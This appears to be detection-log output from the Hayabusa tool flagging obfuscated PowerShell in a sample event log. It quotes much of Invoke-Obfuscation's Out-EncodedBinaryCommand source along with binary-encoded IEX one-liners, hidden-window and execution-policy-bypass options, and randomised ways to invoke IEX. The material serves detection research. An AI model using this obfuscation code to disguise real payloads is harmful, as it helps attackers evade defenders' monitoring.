('1010111y1110010W1101001{1110100G1100101y101101;1001000T1101111@1110011G1110100y100000@100111y1001000@1100101d1101100<1101100b1101111d100000W1010111@1101111G1110010{1101100@1100100@100001<100111G100000y101101;1000110;1101111y1110010G1100101d1100111y1110010G1101111@1110101W1101110b1100100G1000011;1101111d1101100{1101111y1110010d100000<1000111<1110010T1100101W1100101@1101110d111011{100000T1010111{1110010{1101001{1110100y1100101b101101<1001000y1101111{1110011W1110100d100000d100111b1001111<1100010b1100110<1110101d1110011W1100011W1100001T1110100T1101001{1101111;1101110W100000T1010010b1101111<1100011W1101011;1110011;100001d100111@100000y101101<1000110T1101111G1110010{1100101W1100111{1110010G1101111d1110101W1101110@1100100@1000011{1101111d1101100y1101111T1110010{100000{1000111{1110010T1100101b1100101;1101110'-SplIt'b'-SpLit '@'-SPLIt '{' -SpLIT'<'-SPLIT'd' -SpLIT 'T'-SplIt ';' -SpLiT 'G' -SPLiT'y'-SpLiT'W' | ForEach-Object { ([Char]([Convert]::ToInt16(( $_.ToString() ) ,2) ))} )| IEX"" C:\PS> Out-EncodedBinaryCommand -ScriptBlock {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green} -NoProfile -NonInteractive -PassThru IEX( -Join ('1010111<1110010>1101001a1110100>1100101r101101{1001000@1101111l1110011l1110100a100000<100111m1001000r1100101{1101100{1101100{1101111>100000{1010111>1101111>1110010m1101100O1100100a100001O100111&100000@101101&1000110<1101111a1110010&1100101&1100111O1110010r1101111r1110101<1101110O1100100m1000011{1101111>1101100m1101111{1110010m100000{1000111a1110010>1100101>1100101m1101110&111011O100000r1010111&1110010l1101001{1110100{1100101r101101@1001000&1101111>1110011<1110100&100000>100111a1001111{1100010a1100110@1110101{1110011&1100011r1100001@1110100l1101001>1101111a1101110a100000@1010010a1101111r1100011a1101011m1110011{100001<100111a100000{101101@1000110a1101111{1110010m1100101a1100111>1110010l1101111m1110101l1101110@1100100r1000011&1101111r1101100O1101111m1110010a100000@1000111@1110010O1100101@1100101@1101110'.Split( 'l@>{r [CmdletBinding(DefaultParameterSetName = 'FilePath')] Param ( [Parameter(Position = 0, ValueFromPipeline = $True, ParameterSetName = 'ScriptBlock')] [ValidateNotNullOrEmpty()] [ScriptBlock] $ScriptBlock, [Parameter(Position = 0, ParameterSetName = 'FilePath')] [ValidateNotNullOrEmpty()] [String] $Path, [Switch] $NoExit, [Switch] $NoProfile, [Switch] $NonInteractive, [Switch] $NoLogo, [Switch] $Wow64, [Switch] $Command, [ValidateSet('Normal', 'Minimized', 'Maximized', 'Hidden')] [String] $WindowStyle, [ValidateSet('Bypass', 'Unrestricted', 'RemoteSigned', 'AllSigned', 'Restricted')] [String] $ExecutionPolicy, [Switch] $PassThru ) # Encoding base values: 16=Hex, 8=Octal, 2=Binary $EncodingBase = 2 # Either convert ScriptBlock to a String or convert script at $Path to a String. If($PSBoundParameters['Path']) { Get-ChildItem $Path -ErrorAction Stop | Out-Null $ScriptString = [IO.File]::ReadAllText((Resolve-Path $Path)) } Else { $ScriptString = [String]$ScriptBlock } # Create list of random delimiters $RandomDelimiters. # Avoid using . * ' "" [ ] ( ) etc. as delimiters as these will cause problems in the -Split command syntax. $RandomDelimiters = @('_','-',',','{','}','~','!','@','%','&','<','>',';',':') # Add letters a-z with random case to $RandomDelimiters. @('a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z') | ForEach-Object {$UpperLowerChar = $_; If(((Get-Random -Input @(1..2))-1 -eq 0)) {$UpperLowerChar = $UpperLowerChar.ToUpper()} $RandomDelimiters += $UpperLowerChar} # Only use a subset of current delimiters to randomize what you see in every iteration of this script's output. $RandomDelimiters = (Get-Random -Input $RandomDelimiters -Count ($RandomDelimiters.Count/4)) # Convert $ScriptString to delimited Binary values in [Char] array separated by random delimiter from defined list $RandomDelimiters. $DelimitedEncodedArray = '' ([Char[]]$ScriptString) | ForEach-Object {$DelimitedEncodedArray += ([Convert]::ToString(([Int][Char]$_),$EncodingBase) + (Get-Random -Input $RandomDelimiters))} # Remove trailing delimiter from $DelimitedEncodedArray. $DelimitedEncodedArray = $DelimitedEncodedArray.SubString(0,$DelimitedEncodedArray.Length-1) # Create printable version of $RandomDelimiters in random order to be used by final command. $RandomDelimitersToPrint = (Get-Random -Input $RandomDelimiters -Count $RandomDelimiters.Length) -Join '' # Generate random case versions for necessary operations. $ForEachObject = Get-Random -Input @('ForEach','ForEach-Object','%') $StrJoin = ([Char[]]'[String]::Join' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $StrStr = ([Char[]]'[String]' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $Join = ([Char[]]'-Join' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $CharStr = ([Char[]]'Char' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $Int = ([Char[]]'Int' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $ForEachObject = ([Char[]]$ForEachObject | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $ToInt16 = ([Char[]]'[Convert]::ToInt16(' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' # Create printable version of $RandomDelimiters in random order to be used by final command specifically for -Split syntax. $RandomDelimitersToPrintForDashSplit = '' ForEach($RandomDelimiter in $RandomDelimiters) { # Random case 'split' string. $Split = ([Char[]]'Split' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $RandomDelimitersToPrintForDashSplit += ('-' + $Split + ' '*(Get-Random -Input @(0,1)) + ""'"" + $RandomDelimiter + ""'"" + ' '*(Get-Random -Input @(0,1))) } $RandomDelimitersToPrintForDashSplit = $RandomDelimitersToPrintForDashSplit.Trim() # Randomly select between various conversion syntax options. $RandomStringSyntax = ([Char[]](Get-Random -Input @('[String]$_','$_.ToString()')) | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $RandomConversionSyntax = @() $RandomConversionSyntax += ""[$CharStr]"" + ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + $ToInt16 + ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + $RandomStringSyntax + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + ',' + $EncodingBase + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + ')' $RandomConversionSyntax += $ToInt16 + ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + $RandomStringSyntax + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + ',' + ' '*(Get-Random -Input @(0,1)) + $EncodingBase + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + (Get-Random -Input @('-as','-As','-aS','-AS')) + ' '*(Get-Random -Input @(0,1)) + ""[$CharStr]"" $RandomConversionSyntax = (Get-Random -Input $RandomConversionSyntax) # Create array syntax for encoded $ScriptString as alternative to .Split/-Split syntax. $EncodedArray = '' ([Char[]]$ScriptString) | ForEach-Object { # Encapsulate current item with single quote if it contains a non-integer. If([Convert]::ToString(([Int][Char]$_),$EncodingBase).Trim('0123456789').Length -gt 0) {$Quote = ""'""} Else {$Quote = ''} $EncodedArray += ($Quote + [Convert]::ToString(([Int][Char]$_),$EncodingBase) + $Quote + ' '*(Get-Random -Input @(0,1)) + ',' + ' '*(Get-Random -Input @(0,1))) } # Remove trailing comma from $EncodedArray. $EncodedArray = ('(' + ' '*(Get-Random -Input @(0,1)) + $EncodedArray.Trim().Trim(',') + ')') # Generate random syntax to create/set OFS variable ($OFS is the Output Field Separator automatic variable). # Using Set-Item and Set-Variable/SV/SET syntax. Not using New-Item in case OFS variable already exists. # If the OFS variable did exists then we could use even more syntax: $varname, Set-Variable/SV, Set-Item/SET, Get-Variable/GV/Variable, Get-ChildItem/GCI/ChildItem/Dir/Ls # For more info: https://msdn.microsoft.com/en-us/powershell/reference/5.1/microsoft.powershell.core/about/about_automatic_variables $SetOfsVarSyntax = @() $SetOfsVarSyntax += 'Set-Item' + ' '*(Get-Random -Input @(1,2)) + ""'Variable:OFS'"" + ' '*(Get-Random -Input @(1,2)) + ""''"" $SetOfsVarSyntax += (Get-Random -Input @('Set-Variable','SV','SET')) + ' '*(Get-Random -Input @(1,2)) + ""'OFS'"" + ' '*(Get-Random -Input @(1,2)) + ""''"" $SetOfsVar = (Get-Random -Input $SetOfsVarSyntax) $SetOfsVarBackSyntax = @() $SetOfsVarBackSyntax += 'Set-Item' + ' '*(Get-Random -Input @(1,2)) + ""'Variable:OFS'"" + ' '*(Get-Random -Input @(1,2)) + ""' '"" $SetOfsVarBackSyntax += (Get-Random -Input @('Set-Variable','SV','SET')) + ' '*(Get-Random -Input @(1,2)) + ""'OFS'"" + ' '*(Get-Random -Input @(1,2)) + ""' '"" $SetOfsVarBack = (Get-Random -Input $SetOfsVarBackSyntax) # Randomize case of $SetOfsVar and $SetOfsVarBack. $SetOfsVar = ([Char[]]$SetOfsVar | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $SetOfsVarBack = ([Char[]]$SetOfsVarBack | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' # Generate the code that will decrypt and execute the payload and randomly select one. $BaseScriptArray = @() $BaseScriptArray += '(' + ' '*(Get-Random -Input @(0,1)) + ""'"" + $DelimitedEncodedArray + ""'."" + $Split + ""("" + ' '*(Get-Random -Input @(0,1)) + ""'"" + $RandomDelimitersToPrint + ""'"" + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + '|' + ' '*(Get-Random -Input @(0,1)) + $ForEachObject + ' '*(Get-Random -Input @(0,1)) + '{' + ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + $RandomConversionSyntax + ')' + ' '*(Get-Random -Input @(0,1)) + '}' + ' '*(Get-Random -Input @(0,1)) + ')' $BaseScriptArray += '(' + ' '*(Get-Random -Input @(0,1)) + ""'"" + $DelimitedEncodedArray + ""'"" + ' '*(Get-Random -Input @(0,1)) + $RandomDelimitersToPrintForDashSplit + ' '*(Get-Random -Input @(0,1)) + '|' + ' '*(Get-Random -Input @(0,1)) + $ForEachObject + ' '*(Get-Random -Input @(0,1)) + '{' + ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + $RandomConversionSyntax + ')' + ' '*(Get-Random -Input @(0,1)) + '}' + ' '*(Get-Random -Input @(0,1)) + ')' $BaseScriptArray += '(' + ' '*(Get-Random -Input @(0,1)) + $EncodedArray + ' '*(Get-Random -Input @(0,1)) + '|' + ' '*(Get-Random -Input @(0,1)) + $ForEachObject + ' '*(Get-Random -Input @(0,1)) + '{' + ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + $RandomConversionSyntax + ')' + ' '*(Get-Random -Input @(0,1)) + '}' + ' '*(Get-Random -Input @(0,1)) + ')' # Generate random JOIN syntax for all above options. $NewScriptArray = @() $NewScriptArray += (Get-Random -Input $BaseScriptArray) + ' '*(Get-Random -Input @(0,1)) + $Join + ' '*(Get-Random -Input @(0,1)) + ""''"" $NewScriptArray += $Join + ' '*(Get-Random -Input @(0,1)) + (Get-Random -Input $BaseScriptArray) $NewScriptArray += $StrJoin + '(' + ' '*(Get-Random -Input @(0,1)) + ""''"" + ' '*(Get-Random -Input @(0,1)) + ',' + ' '*(Get-Random -Input @(0,1)) + (Get-Random -Input $BaseScriptArray) + ' '*(Get-Random -Input @(0,1)) + ')' $NewScriptArray += '""' + ' '*(Get-Random -Input @(0,1)) + '$(' + ' '*(Get-Random -Input @(0,1)) + $SetOfsVar + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + '""' + ' '*(Get-Random -Input @(0,1)) + '+' + ' '*(Get-Random -Input @(0,1)) + $StrStr + (Get-Random -Input $BaseScriptArray) + ' '*(Get-Random -Input @(0,1)) + '+' + '""' + ' '*(Get-Random -Input @(0,1)) + '$(' + ' '*(Get-Random -Input @(0,1)) + $SetOfsVarBack + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + '""' # Randomly select one of the above commands. $NewScript = (Get-Random -Input $NewScriptArray) # Generate random invoke operation syntax. # Below code block is a copy from Out-ObfuscatedStringCommand.ps1. It is copied into this encoding function so that this will remain a standalone script without dependencies. $InvokeExpressionSyntax = @() $InvokeExpressionSyntax += (Get-Random -Input @('IEX','Invoke-Expression')) # Added below slightly-randomized obfuscated ways to form the string 'iex' and then invoke it with . or &. # Though far from fully built out, these are included to highlight how IEX/Invoke-Expression is a great indicator but not a silver bullet. # These methods draw on common environment variable values and PowerShell Automatic Variable values/methods/members/properties/etc. $InvocationOperator = (Get-Random -Input @('.','&')) + ' '*(Get-Random -Input @(0,1)) $InvokeExpressionSyntax += $InvocationOperator + ""( `$ShellId[1]+`$ShellId[13]+'x')"" $InvokeExpressionSyntax += $InvocationOperator + ""( `$PSHome["" + (Get-Random -Input @(4,21)) + ""]+`$PSHome["" + (Get-Random -Input @(30,34)) + ""]+'x')"" $InvokeExpressionSyntax += $InvocationOperator + ""( `$env:Public[13]+`$env:Public[5]+'x')"" $InvokeExpressionSyntax += $InvocationOperator + ""( `$env:ComSpec[4,"" + (Get-Random -Input @(15,24,26)) + "",25]-Join'')"" $InvokeExpressionSyntax += $InvocationOperator + ""(("" + (Get-Random -Input @('Get-Variable','GV','Variable')) + "" '*mdr*').Name[3,11,2]-Join'')"" $InvokeExpressionSyntax += $InvocationOperator + ""( "" + (Get-Random -Input @('$VerbosePreference.ToString()','([String]$VerbosePreference)')) + ""[1,3]+'x'-Join'')"" # Randomly choose from above invoke operation syntaxes. $InvokeExpression = (Get-Random -Input $InvokeExpressionSyntax) # Randomize the case of selected invoke operation. $InvokeExpression = ([Char[]]$InvokeExpression | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' # Choose random Invoke-Expression/IEX syntax and ordering: IEX ($ScriptString) or ($ScriptString | IEX) $InvokeOptions = @() $InvokeOptions += ' '*(Get-Random -Input @(0,1)) + $InvokeExpression + ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + $NewScript + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) $InvokeOptions += ' '*(Get-Random -Input @(0,1)) + $NewScript + ' '*(Get-Random -Input @(0,1)) + '|' + ' '*(Get-Random -Input @(0,1)) + $InvokeExpression $NewScript = (Get-Random -Input $InvokeOptions) # If user did not include -PassThru flag then continue with adding execution flgs and powershell.exe to $NewScript. If(!$PSBoundParameters['PassThru']) { # Array to store all selected PowerShell execution flags. $PowerShellFlags = @() # Build the PowerShell execution flags by randomly selecting execution flags substrings and rando",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:15:55.266 +09:00,SEC511,4104,medium,Evas,Suspicious PowerShell WindowStyle Option,,../hayabusa-rules/sigma/powershell/powershell_script/posh_ps_suspicious_windowstyle.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:15:55.266 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"# This file is part of Invoke-Obfuscation. # # Copyright 2017 Daniel Bohannon <@danielhbohannon> # while at Mandiant # # Licensed under the Apache License, Version 2.0 (the ""License""); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an ""AS IS"" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. Function Out-EncodedBinaryCommand { <# .SYNOPSIS Generates binary encoded payload for a PowerShell command or script. Optionally it adds command line output to final command. Invoke-Obfuscation Function: Out-EncodedBinaryCommand Author: Daniel Bohannon (@danielhbohannon) License: Apache License, Version 2.0 Required Dependencies: None Optional Dependencies: None .DESCRIPTION Out-EncodedBinaryCommand encodes an input PowerShell scriptblock or path as a binary payload. It randomly chooses between .Split/-Split/array syntax to store the encoded payload in the final output. The purpose is to highlight to the Blue Team that there are more novel ways to encode a PowerShell command other than the most common Base64 approach. .PARAMETER ScriptBlock Specifies a scriptblock containing your payload. .PARAMETER Path Specifies the path to your payload. .PARAMETER NoExit Outputs the option to not exit after running startup commands. .PARAMETER NoProfile Outputs the option to not load the Windows PowerShell profile. .PARAMETER NonInteractive Outputs the option to not present an interactive prompt to the user. .PARAMETER NoLogo Outputs the option to not present the logo to the user. .PARAMETER Wow64 Calls the x86 (Wow64) version of PowerShell on x86_64 Windows installations. .PARAMETER Command Outputs the option to execute the specified commands (and any parameters) as though they were typed at the Windows PowerShell command prompt. .PARAMETER WindowStyle Outputs the option to set the window style to Normal, Minimized, Maximized or Hidden. .PARAMETER ExecutionPolicy Outputs the option to set the default execution policy for the current session. .PARAMETER PassThru (Optional) Avoids applying final command line syntax if you want to apply more obfuscation functions (or a different launcher function) to the final output. .EXAMPLE C:\PS> Out-EncodedBinaryCommand -ScriptBlock {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green} -NoProfile -NonInteractive powershell -NonIn -NoProf ""-Join ('1010111y1110010W1101001{1110100G1100101y101101;1001000T1101111@1110011G1110100y100000@100111y1001000@1100101d1101100<1101100b1101111d100000W1010111@1101111G1110010{1101100@1100100@100001<100111G100000y101101;1000110;1101111y1110010G1100101d1100111y1110010G1101111@1110101W1101110b1100100G1000011;1101111d1101100{1101111y1110010d100000<1000111<1110010T1100101W1100101@1101110d111011{100000T1010111{1110010{1101001{1110100y1100101b101101<1001000y1101111{1110011W1110100d100000d100111b1001111<1100010b1100110<1110101d1110011W1100011W1100001T1110100T1101001{1101111;1101110W100000T1010010b1101111<1100011W1101011;1110011;100001d100111@100000y101101<1000110T1101111G1110010{1100101W1100111{1110010G1101111d1110101W1101110@1100100@1000011{1101111d1101100y1101111T1110010{100000{1000111{1110010T1100101b1100101;1101110'-SplIt'b'-SpLit '@'-SPLIt '{' -SpLIT'<'-SPLIT'd' -SpLIT 'T'-SplIt ';' -SpLiT 'G' -SPLiT'y'-SpLiT'W' | ForEach-Object { ([Char]([Convert]::ToInt16(( $_.ToString() ) ,2) ))} )| IEX"" C:\PS> Out-EncodedBinaryCommand -ScriptBlock {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green} -NoProfile -NonInteractive -PassThru IEX( -Join ('1010111<1110010>1101001a1110100>1100101r101101{1001000@1101111l1110011l1110100a100000<100111m1001000r1100101{1101100{1101100{1101111>100000{1010111>1101111>1110010m1101100O1100100a100001O100111&100000@101101&1000110<1101111a1110010&1100101&1100111O1110010r1101111r1110101<1101110O1100100m1000011{1101111>1101100m1101111{1110010m100000{1000111a1110010>1100101>1100101m1101110&111011O100000r1010111&1110010l1101001{1110100{1100101r101101@1001000&1101111>1110011<1110100&100000>100111a1001111{1100010a1100110@1110101{1110011&1100011r1100001@1110100l1101001>1101111a1101110a100000@1010010a1101111r1100011a1101011m1110011{100001<100111a100000{101101@1000110a1101111{1110010m1100101a1100111>1110010l1101111m1110101l1101110@1100100r1000011&1101111r1101100O1101111m1110010a100000@1000111@1110010O1100101@1100101@1101110'.Split( 'l@>{r [CmdletBinding(DefaultParameterSetName = 'FilePath')] Param ( [Parameter(Position = 0, ValueFromPipeline = $True, ParameterSetName = 'ScriptBlock')] [ValidateNotNullOrEmpty()] [ScriptBlock] $ScriptBlock, [Parameter(Position = 0, ParameterSetName = 'FilePath')] [ValidateNotNullOrEmpty()] [String] $Path, [Switch] $NoExit, [Switch] $NoProfile, [Switch] $NonInteractive, [Switch] $NoLogo, [Switch] $Wow64, [Switch] $Command, [ValidateSet('Normal', 'Minimized', 'Maximized', 'Hidden')] [String] $WindowStyle, [ValidateSet('Bypass', 'Unrestricted', 'RemoteSigned', 'AllSigned', 'Restricted')] [String] $ExecutionPolicy, [Switch] $PassThru ) # Encoding base values: 16=Hex, 8=Octal, 2=Binary $EncodingBase = 2 # Either convert ScriptBlock to a String or convert script at $Path to a String. If($PSBoundParameters['Path']) { Get-ChildItem $Path -ErrorAction Stop | Out-Null $ScriptString = [IO.File]::ReadAllText((Resolve-Path $Path)) } Else { $ScriptString = [String]$ScriptBlock } # Create list of random delimiters $RandomDelimiters. # Avoid using . * ' "" [ ] ( ) etc. as delimiters as these will cause problems in the -Split command syntax. $RandomDelimiters = @('_','-',',','{','}','~','!','@','%','&','<','>',';',':') # Add letters a-z with random case to $RandomDelimiters. @('a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z') | ForEach-Object {$UpperLowerChar = $_; If(((Get-Random -Input @(1..2))-1 -eq 0)) {$UpperLowerChar = $UpperLowerChar.ToUpper()} $RandomDelimiters += $UpperLowerChar} # Only use a subset of current delimiters to randomize what you see in every iteration of this script's output. $RandomDelimiters = (Get-Random -Input $RandomDelimiters -Count ($RandomDelimiters.Count/4)) # Convert $ScriptString to delimited Binary values in [Char] array separated by random delimiter from defined list $RandomDelimiters. $DelimitedEncodedArray = '' ([Char[]]$ScriptString) | ForEach-Object {$DelimitedEncodedArray += ([Convert]::ToString(([Int][Char]$_),$EncodingBase) + (Get-Random -Input $RandomDelimiters))} # Remove trailing delimiter from $DelimitedEncodedArray. $DelimitedEncodedArray = $DelimitedEncodedArray.SubString(0,$DelimitedEncodedArray.Length-1) # Create printable version of $RandomDelimiters in random order to be used by final command. $RandomDelimitersToPrint = (Get-Random -Input $RandomDelimiters -Count $RandomDelimiters.Length) -Join '' # Generate random case versions for necessary operations. $ForEachObject = Get-Random -Input @('ForEach','ForEach-Object','%') $StrJoin = ([Char[]]'[String]::Join' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $StrStr = ([Char[]]'[String]' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $Join = ([Char[]]'-Join' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $CharStr = ([Char[]]'Char' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $Int = ([Char[]]'Int' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $ForEachObject = ([Char[]]$ForEachObject | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $ToInt16 = ([Char[]]'[Convert]::ToInt16(' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' # Create printable version of $RandomDelimiters in random order to be used by final command specifically for -Split syntax. $RandomDelimitersToPrintForDashSplit = '' ForEach($RandomDelimiter in $RandomDelimiters) { # Random case 'split' string. $Split = ([Char[]]'Split' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $RandomDelimitersToPrintForDashSplit += ('-' + $Split + ' '*(Get-Random -Input @(0,1)) + ""'"" + $RandomDelimiter + ""'"" + ' '*(Get-Random -Input @(0,1))) } $RandomDelimitersToPrintForDashSplit = $RandomDelimitersToPrintForDashSplit.Trim() # Randomly select between various conversion syntax options. $RandomStringSyntax = ([Char[]](Get-Random -Input @('[String]$_','$_.ToString()')) | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $RandomConversionSyntax = @() $RandomConversionSyntax += ""[$CharStr]"" + ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + $ToInt16 + ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + $RandomStringSyntax + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + ',' + $EncodingBase + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + ')' $RandomConversionSyntax += $ToInt16 + ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + $RandomStringSyntax + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + ',' + ' '*(Get-Random -Input @(0,1)) + $EncodingBase + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + (Get-Random -Input @('-as','-As','-aS','-AS')) + ' '*(Get-Random -Input @(0,1)) + ""[$CharStr]"" $RandomConversionSyntax = (Get-Random -Input $RandomConversionSyntax) # Create array syntax for encoded $ScriptString as alternative to .Split/-Split syntax. $EncodedArray = '' ([Char[]]$ScriptString) | ForEach-Object { # Encapsulate current item with single quote if it contains a non-integer. If([Convert]::ToString(([Int][Char]$_),$EncodingBase).Trim('0123456789').Length -gt 0) {$Quote = ""'""} Else {$Quote = ''} $EncodedArray += ($Quote + [Convert]::ToString(([Int][Char]$_),$EncodingBase) + $Quote + ' '*(Get-Random -Input @(0,1)) + ',' + ' '*(Get-Random -Input @(0,1))) } # Remove trailing comma from $EncodedArray. $EncodedArray = ('(' + ' '*(Get-Random -Input @(0,1)) + $EncodedArray.Trim().Trim(',') + ')') # Generate random syntax to create/set OFS variable ($OFS is the Output Field Separator automatic variable). # Using Set-Item and Set-Variable/SV/SET syntax. Not using New-Item in case OFS variable already exists. # If the OFS variable did exists then we could use even more syntax: $varname, Set-Variable/SV, Set-Item/SET, Get-Variable/GV/Variable, Get-ChildItem/GCI/ChildItem/Dir/Ls # For more info: https://msdn.microsoft.com/en-us/powershell/reference/5.1/microsoft.powershell.core/about/about_automatic_variables $SetOfsVarSyntax = @() $SetOfsVarSyntax += 'Set-Item' + ' '*(Get-Random -Input @(1,2)) + ""'Variable:OFS'"" + ' '*(Get-Random -Input @(1,2)) + ""''"" $SetOfsVarSyntax += (Get-Random -Input @('Set-Variable','SV','SET')) + ' '*(Get-Random -Input @(1,2)) + ""'OFS'"" + ' '*(Get-Random -Input @(1,2)) + ""''"" $SetOfsVar = (Get-Random -Input $SetOfsVarSyntax) $SetOfsVarBackSyntax = @() $SetOfsVarBackSyntax += 'Set-Item' + ' '*(Get-Random -Input @(1,2)) + ""'Variable:OFS'"" + ' '*(Get-Random -Input @(1,2)) + ""' '"" $SetOfsVarBackSyntax += (Get-Random -Input @('Set-Variable','SV','SET')) + ' '*(Get-Random -Input @(1,2)) + ""'OFS'"" + ' '*(Get-Random -Input @(1,2)) + ""' '"" $SetOfsVarBack = (Get-Random -Input $SetOfsVarBackSyntax) # Randomize case of $SetOfsVar and $SetOfsVarBack. $SetOfsVar = ([Char[]]$SetOfsVar | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $SetOfsVarBack = ([Char[]]$SetOfsVarBack | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' # Generate the code that will decrypt and execute the payload and randomly select one. $BaseScriptArray = @() $BaseScriptArray += '(' + ' '*(Get-Random -Input @(0,1)) + ""'"" + $DelimitedEncodedArray + ""'."" + $Split + ""("" + ' '*(Get-Random -Input @(0,1)) + ""'"" + $RandomDelimitersToPrint + ""'"" + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + '|' + ' '*(Get-Random -Input @(0,1)) + $ForEachObject + ' '*(Get-Random -Input @(0,1)) + '{' + ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + $RandomConversionSyntax + ')' + ' '*(Get-Random -Input @(0,1)) + '}' + ' '*(Get-Random -Input @(0,1)) + ')' $BaseScriptArray += '(' + ' '*(Get-Random -Input @(0,1)) + ""'"" + $DelimitedEncodedArray + ""'"" + ' '*(Get-Random -Input @(0,1)) + $RandomDelimitersToPrintForDashSplit + ' '*(Get-Random -Input @(0,1)) + '|' + ' '*(Get-Random -Input @(0,1)) + $ForEachObject + ' '*(Get-Random -Input @(0,1)) + '{' + ' '*(Get-Random -Input @(0,1)) + 